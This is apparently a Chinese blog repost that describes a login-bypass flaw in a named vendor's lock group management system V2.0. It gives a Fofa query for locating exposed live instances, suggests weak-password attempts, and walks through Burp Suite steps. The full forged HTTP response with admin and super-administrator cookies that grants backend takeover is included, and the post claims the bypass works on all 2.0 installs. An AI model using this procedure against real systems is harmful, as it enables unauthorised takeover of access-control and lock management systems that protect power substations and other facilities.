锁群管理系统

大家好，欢迎来到IT知识分享网。

一：漏洞介绍

江苏易索电子科技股份有限公司是专业从事变电站视频监控系统、无源智能锁群管理系统开发、电力智能辅助监控系统,配电房监控系统,智能门禁系统,生产及销售的高科技企业。 江苏易索电子科技股份有限公司锁群管理系统存在逻辑缺陷漏洞，攻击者可利用该漏洞获取敏感信息。

》》》漏洞详情《《《

在登陆处由于只进行了前端验证，造成用户可以伪造前端的返回包内容来绕过登录，进而进入后台接管后台权限。

经过测试发现，可以通杀2.0版本。

二：漏洞利用

步骤一：使用Fofa搜索以下语句并随便打开一个连接地址…尝试若口令登录（admin:）

title=="锁群管理系统 V2.0"

步骤二：设置Burpsuite抓取Response数据包并添加如下规则…

步骤三：在登录页面输入用户名admin并随便输入密码，开启代理抓包修改返回数据包如下…

修改之前：
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
X-Powered-By: ASP.NET
Date: Thu, 25 Nov 2021 09:29:15 GMT
Connection: close
Content-Length: 30

用户名或密码不正确！

修改之后：
HTTP/1.1 200 OK
Cache-Control: private
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.5
X-AspNet-Version: 4.0.30319
Set-Cookie: username=admin; path=/
Set-Cookie: code=admin; path=/
Set-Cookie: power=1; path=/
Set-Cookie: powerName=%e8%b6%85%e7%ba%a7%e7%ae%a1%e7%90%86%e5%91%98; path=/
X-Powered-By: ASP.NET
Date: Thu, 25 Nov 2021 09:29:15 GMT
Connection: close
Content-Length: 30

0

步骤四：放包之后就可以登录到后台界面中…此时操作关闭代理